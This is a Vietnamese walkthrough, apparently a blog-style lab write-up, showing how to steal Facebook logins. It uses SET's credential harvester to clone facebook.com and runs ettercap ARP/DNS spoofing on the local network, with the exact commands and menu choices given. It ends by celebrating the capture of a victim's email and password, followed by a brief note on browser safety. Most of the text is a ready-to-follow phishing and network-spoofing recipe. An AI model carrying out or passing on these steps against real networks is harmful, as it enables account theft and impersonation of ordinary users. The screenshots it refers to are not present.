#
cd /pentest/exploits/set/
#
./set
Sau đó tiếp tục gõ yes và cho ra kết quả như hình bên dưới:
Ta chọn 1 (Social-Engineering Attacks) rồi tiếp tục chọn 2
(Website Attack Vectors)
Tiếp tục chọn 3 (Credential Harverster Attack Method)
Sau
đó chọn 2 (Site Cloner)
Tiếp
tục ta nhập IP máy Attacker vào rồi sau đó nhập địa chỉ web facebook là www.facebook.com
vào (đây chính là website Attacker sẽ giả mạo). Kết quả giống hình bên dưới:
Giờ
ta sẽ thực hiện điều hướng và giả mạo DNS. Ta gõ dòng lệnh sau:
# locate etter.dns
Ta
gõ tiếp dòng lệnh sau để vào cấu hình giả mạo DNS đánh lừa người dùng:
# vi /usr/local/share/etter.dns
Ta
thay thế toàn bộ địa chỉ cũ thành địa chỉ của attacker rồi lưu lại. Ta được kết
quả như hình dưới đây:
Bắt
đầu quá trình giả mạo DNS bằng lệnh sau:
# ettercap –Tqi eth0 –P dns_spoof
–M arp // //
Và
đưa ra kết quả như hình bên dưới:
Chuyển
sang máy victim và thực hiện đăng nhập vào facebook
Giờ
ta quay lại máy attacker và đã thu được thành quả. Ta đã có được user và
password facebook của nạn nhân.
Ở
hình bên dưới ta có được email đăng nhập và password của nạn nhân, vậy là đã
thành công.
-
Đề phòng các đường dẫn lạ, không nên click vào những đường dẫn chưa được chứng
thực để tránh bị hacker lợi dụng. Không sử dụng facebook trên trình duyệt IE vì
ở trình duyệt này bảo mật rất kém và đó
là điểm mà hacker lợi dụng để chiếm đoạt tài khoản của người dùng.
Nên dùng
trình duyệt web như chrome, firefox hay Microsoft Edge (Lưu ý: riêng chrome và
firefox ta nên dùng ở phiên bản mới nhất tại vị ở những phiên bản thấp hacker vẫn
có thể lợi dụng lỗ hổng bảo mật để chiếm đoạt tài khoản của người dùng).
